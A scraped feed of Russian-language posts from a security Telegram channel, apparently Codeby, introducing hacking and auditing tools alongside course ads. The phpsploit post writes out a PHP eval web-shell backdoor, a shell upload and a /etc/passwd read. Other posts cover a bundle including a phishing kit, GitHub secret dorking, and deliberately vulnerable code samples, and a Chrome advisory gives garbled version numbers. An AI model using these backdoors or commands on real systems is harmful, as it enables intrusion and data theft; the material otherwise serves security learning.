BCHackTool
BCHackTool — это программа, в которой собрано большое количество популярных утилит. В эту подборку вошла уже известная нам утилита как Zphisher. Утилита также ориентирована для
💡 Характиристика:
⏺️ Компактность - Популярные утилиты в одном месте
⏺️ Удобство - Утилита сама устанавливает утилиты
⏺️ Простота - Утилита имеет некую удобную оболочку для взаимодейтсвия
📎 Установка:
Использование:
Выбираем нужную нам утилиту.
BCHackTool — это программа, в которой собрано большое количество популярных утилит. В эту подборку вошла уже известная нам утилита как Zphisher. Утилита также ориентирована для
Termux
.git clone https://github.com/ByCh4n/BCHackTool.git
cd BCHackTool/
chmod +x bchacktool.sh
Использование:
sudo bash ./bchacktool.sh
Выбираем нужную нам утилиту.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤4
Готовы пройти собеседование на OSINT-специалиста с Катей Тьюринг?
🟧 СЕГОДНЯ в 19:00 (мск)
🟧 Регистрация
Что обсудим?
🟧 Как читать OSINT-вакансии между строк и где их искать
🟧 Типичные ошибки кандидатов на собесах — и как их избежать
🟧 Что реально проверяют: от теории до практических кейсов
Не пропустите!😎
🟧 Регистрируйтесь здесь и получите ссылку на эфир в ответном письме.
🚀 Трудности с регистрацией? Пишите @Codeby_Academy
Что обсудим?
Не пропустите!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍8🔥5😁3
Вы еще успеваете присоединиться!
Please open Telegram to view this post
VIEW IN TELEGRAM
webinar-osint-interview.codeby.school
Вебинар: Как пройти собеседование на OSINT-специалиста
Всё о собеседованиях и практике OSINT: реальные вопросы, разбор заданий, ошибки новичков. Бесплатно 14 июля в 19:00 МСК.
👍10🔥9❤5😁1
AdaptixC2
Adaptix — это инструмент, который помогает специалистам по безопасности тестировать системы на уязвимости. Он позволяет им эмулировать действия злоумышленников после того, как они получили доступ к системе.
💡 Характиристика:
Гибкость - Утилита позволяет операторам настраивать профили в формате JSON для управления аутентификацией и конфигурацией серверных ответов.
Архитектура сервер/клиент - Поддержка многопользовательского взаимодействия.
Кроссплатформенный GUI - Клиентская часть написана на C++ с использованием QT (т.е он доступен для Linux,Windows,MacOS)
Шифрование - Все коммуникации между сервером и клиентом полностью зашифрованы.
Расширяемость клиента - Возможность добавления новых инструментов.
Хранение задач и работ - Удобное управление задачами и работами.
Поддержка прокси - Socks4, Socks5 и Socks5 Auth.
Портовое переадресация - Локальная и обратная поддержка.
Поддержка BOF - Возможность использования BOF (Binary Object Format).
Мониторинг состояния агентов - Проверка состояния агентов и контроль времени работы.
📎 Установка:
📌 Использование:
⏺️ Сборка серверной части:
⏺️ Запуск:
Сборка клиентской части:
Adaptix — это инструмент, который помогает специалистам по безопасности тестировать системы на уязвимости. Он позволяет им эмулировать действия злоумышленников после того, как они получили доступ к системе.
Гибкость - Утилита позволяет операторам настраивать профили в формате JSON для управления аутентификацией и конфигурацией серверных ответов.
Архитектура сервер/клиент - Поддержка многопользовательского взаимодействия.
Кроссплатформенный GUI - Клиентская часть написана на C++ с использованием QT (т.е он доступен для Linux,Windows,MacOS)
Шифрование - Все коммуникации между сервером и клиентом полностью зашифрованы.
Расширяемость клиента - Возможность добавления новых инструментов.
Хранение задач и работ - Удобное управление задачами и работами.
Поддержка прокси - Socks4, Socks5 и Socks5 Auth.
Портовое переадресация - Локальная и обратная поддержка.
Поддержка BOF - Возможность использования BOF (Binary Object Format).
Мониторинг состояния агентов - Проверка состояния агентов и контроль времени работы.
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
sudo apt install mingw-w64 make
wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
make server
make extenders
cd dist
openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650
./adaptoxserver --profile profile.json
Сборка клиентской части:
make client
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍12🔥5🏆1
Graudit: инструмент для поиска уязвимостей в коде
🟧 Установка Graudit
Graudit можно установить из репозитория:
🟧 Как работает Graudit?
Graudit анализирует исходный код, используя предопределённые наборы правил (сигнатуры), которые соответствуют распространённым уязвимостям.
Поддерживаемые языки:
🟧 PHP, Java, Python, Ruby
🟧 C/C++, Go, JavaScript
🟧 Bash, Perl, ASP
Файлы с сигнатурами хранятся в папке
🟧 Примеры использования
1. Базовое сканирование
Проверим PHP-код на уязвимости:
Вывод будет содержать строки кода, похожие на уязвимые паттерны.
2. Поиск SQL-инъекций
🟧 Пример уязвимого кода и его анализ
🟧 PHP: SQL-инъекция
Graudit обнаружит эту уязвимость, так как в сигнатурах PHP есть правило для SQL-запросов с прямым включением пользовательского ввода.
Можно добавлять свои сигнатуры в /signatures/custom.db:
🟧 Используйте Graudit в связке с:
🟧 Bandit (для Python)
🟧 Semgrep (для глубокого анализа)
🟧 SonarQube (для комплексного сканирования)
Graudit (Grep Rough Audit) — это инструмент для статического анализа безопасности исходного кода, который использует сигнатурный поиск на основе регулярных выражений. Он помогает находить потенциальные уязвимости, такие как SQL-инъекции, XSS, RCE, path traversal и другие. Graudit отличается простотой, высокой скоростью работы и поддержкой множества языков программирования.
Graudit можно установить из репозитория:
git clone https://github.com/wireghoul/grauditПроверяем:
cd graudit
sudo cp graudit /usr/local/bin/ # Добавляем в PATH
graudit -v
Graudit анализирует исходный код, используя предопределённые наборы правил (сигнатуры), которые соответствуют распространённым уязвимостям.
Поддерживаемые языки:
Файлы с сигнатурами хранятся в папке
/signatures/
. 1. Базовое сканирование
Проверим PHP-код на уязвимости:
graudit -d php ./project/
Вывод будет содержать строки кода, похожие на уязвимые паттерны.
2. Поиск SQL-инъекций
graudit -d sql ./project/3. Проверка JavaScript (Node.js) на XSS
graudit -d js ./app.js
// Уязвимый код
$user = $_GET['username'];
$query = "SELECT * FROM users WHERE name = '$user'";
$result = mysqli_query($conn, $query);
Graudit обнаружит эту уязвимость, так как в сигнатурах PHP есть правило для SQL-запросов с прямым включением пользовательского ввода.
🟧
Python: Command Injection import osGraudit выдаст предупреждение, так как os.system с внешними данными — это риск RCE.
user_input = input("Enter filename: ")
os.system(f"cat {user_input}") # Уязвимость!
🟧
Расширение возможностей Graudit Можно добавлять свои сигнатуры в /signatures/custom.db:
Пример правила для поиска опасных функций в Pythonlabel: Dangerous Python eval()pattern: eval\(.*\$Теперь при сканировании Python-кода Graudit будет искать eval().
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤5🔥5
Решите его и напишите спрятанное слово в комментариях!
Please open Telegram to view this post
VIEW IN TELEGRAM
40❤18🔥11👍8😁1😱1
Intellifuzz
Intellifuzz - умная AI-powered обёртка для веб-фаззера ffuf. Автоматически анализирует цель и предлагает оптимальные расширения файлов для фаззинга, используя силу искусственного интеллекта от ведущих провайдеров.
💡 Харакетеристики:
⏺️ Множественные AI-провайдеры - OpenAI, Anthropic Claude, Ollama (локально), OpenRouter.
⏺️ Управление конфигурацией - YAML-конфиг с интерактивной настройкой.
⏺️ Интеграция с ffuf - Пропускает все параметры ffuf без изменений.
⏺️ Умные предложения - Контекстно-зависимые рекомендации расширений файлов.
⏺️ Гибкая аутентификация - API-ключи, переменные окружения, локальные модели.
📎 Установка:
📌 Использование:
Удовольствие такое не бесплатное, за использование API просят плату
Intellifuzz - умная AI-powered обёртка для веб-фаззера ffuf. Автоматически анализирует цель и предлагает оптимальные расширения файлов для фаззинга, используя силу искусственного интеллекта от ведущих провайдеров.
git clone https://github.com/cansolele/intellifuzz
cd intellifuzz
pip install -r requirements.txt
Заходим на сайт openAI под другой страной и в API Platforms, в настройках пользвателя cоздаём секретный ключ, называем проект как угодно и вставляем его в файл config.yaml
python intellifuzz.py https://google.com
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤7👍7👎4
Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну
Если в вашей программе есть CMP + JE — её уже взломали.
Но что если заменить проверку пароля на хаотичные прыжки, шифрование и ложные исключения?
В статье разберем нестандартные способы защиты:
⚪️ Пароль = ключ дешифровки — без него код просто не соберётся.
⚪️ Ловушки для отладчика — SEH, антитрассировка и ложные CMP.
⚪️ Самомодифицирующийся код — программа меняет себя при каждом запуске.
⚪️ Пароль из кусочков — собирается только в памяти и никогда не хранится целиком.
📍 Чем больше хаоса, тем меньше шансов у реверсера.
➡️ Читайте подробнее в новой статье!
Если в вашей программе есть CMP + JE — её уже взломали.
Но что если заменить проверку пароля на хаотичные прыжки, шифрование и ложные исключения?
В статье разберем нестандартные способы защиты:
Please open Telegram to view this post
VIEW IN TELEGRAM
40👍18🔥9❤6
Суть проблемы кроется в компонентах ANGLE (Almost Native Graphics Layer Engine) и GPU браузера. ANGLE выполняет важную функцию - это промежуточный слой между движком рендеринга Chrome и графическими драйверами устройства. Ошибка в проверке входящих данных позволяет злоумышленникам осуществить так называемый «побег из песочницы».
- Достаточно просто открыть специально созданную веб-страницу
- Никаких дополнительных действий от пользователя не требуется
- Атакующий получает возможность выйти за пределы изолированной среды браузера
- Появляется риск полного компрометирования системы
- Обновите Chrome до версии 38.0.7204.157/.158 (для Windows и macOS) и 138.0.7204.157 (для Linux)
Проверить наличие обновлений можно через меню: «Еще» > «Справка» > «О Google Chrome»
- Не забывайте, что аналогичные обновления необходимо устанавливать и для других браузеров на базе Chromium: Edge, Brave, Opera, Vivaldi
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍6🔥4
На днях сеть алкомаркетов «Винлаб» столкнулась с беспрецедентным инцидентом. Приостановлена работа всех магазинов «Винлаб».
Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании.
Последствия атаки:
🟣 Все розничные точки остаются закрытыми, на дверях размещены уведомления о «технических работах» без конкретных сроков возобновления деятельности
🟣 Официальный сайт сети недоступен
🟣 Клиенты столкнулись с «зависшими» заказами — оплаченный заказ не доставляется и статусы не обновляются
❗️ Владелец сети (Novabev Group) пока не даёт официальных комментариев. По данным инсайдеров, хакеры потребовали выкуп, но руководство отказалось выполнять их условия.
Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании.
Последствия атаки:
Please open Telegram to view this post
VIEW IN TELEGRAM
👾21🔥11👍4❤3🤔3😁1
pspy: Утилита для мониторинга процессов без привилегий root
❓ Основные возможности pspy
➡️ Мониторинг процессов в реальном времени:
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
➡️ Отслеживание задач cron:
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
➡️ Поддержка работы без root:
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
➡️ Совместимость с различными архитектурами:
• Доступен для x64, x86, ARM и других платформ.
➡️ Лёгкость и портативность:
• Выполняется как один бинарный файл без дополнительных зависимостей.
⬇️ Установка и использование
1️⃣ Скачивание pspy:
Загрузите подходящую версию с GitHub:
2️⃣ Запуск мониторинга:
Для наблюдения за процессами выполните:
3️⃣ Фильтрация событий:
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
pspy — это лёгкий и мощный инструмент с открытым исходным кодом, который позволяет отслеживать процессы на Linux-системах без необходимости обладания правами root. Это идеальный инструмент для анализа выполнения задач в реальном времени, поиска уязвимостей и оптимизации системных процессов.
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
• Доступен для x64, x86, ARM и других платформ.
• Выполняется как один бинарный файл без дополнительных зависимостей.
Загрузите подходящую версию с GitHub:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64
Для наблюдения за процессами выполните:
./pspy64
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
./pspy64 | grep cron
Please open Telegram to view this post
VIEW IN TELEGRAM
❤14👍10🔥9🤔1
Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.
Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.
Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:
git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt
Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤9🔥6
Extirpater
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
💡 Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
📎 Установка:
👩💻 Проект доступен в магазине F-droid:
👩💻 Исходный код:
📌 Использование:
Выбирете
Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.
https://f-droid.org/packages/us.spotco.extirpater/
https://github.com/divested-mobile/extirpater
Выбирете
Primary
или Secondary Storage
и нажмите кнопку Start
.Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍9🔥6
phpsploit: Мощный фреймворк для пентеста PHP-приложений
❓ Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.
⬇️ Установка и использование:
1️⃣ Установка phpsploit:
2️⃣ Настройка подключения:
3️⃣ Основные команды:
4️⃣ Пример эксплуатации:
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html
Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤7🔥5👎1
Взламываем мифы о безопасности Android
Знаете ли вы:
🟧 85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧 Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧 Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
✨ Разберете Android-приложения изнутри
✨ Освоите инструменты статического и динамического анализа
✨ Научитесь находить и устранять уязвимости на практике
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
🟠 Успейте записаться
✨ Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
🚀 По всем вопросам пишите @Codeby_Academy
Знаете ли вы:
На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:
21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤7🔥6
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — PDF-библиотека
🎢 Категория Разное — Рекурсия
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤5
Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.
🔥27👍12❤8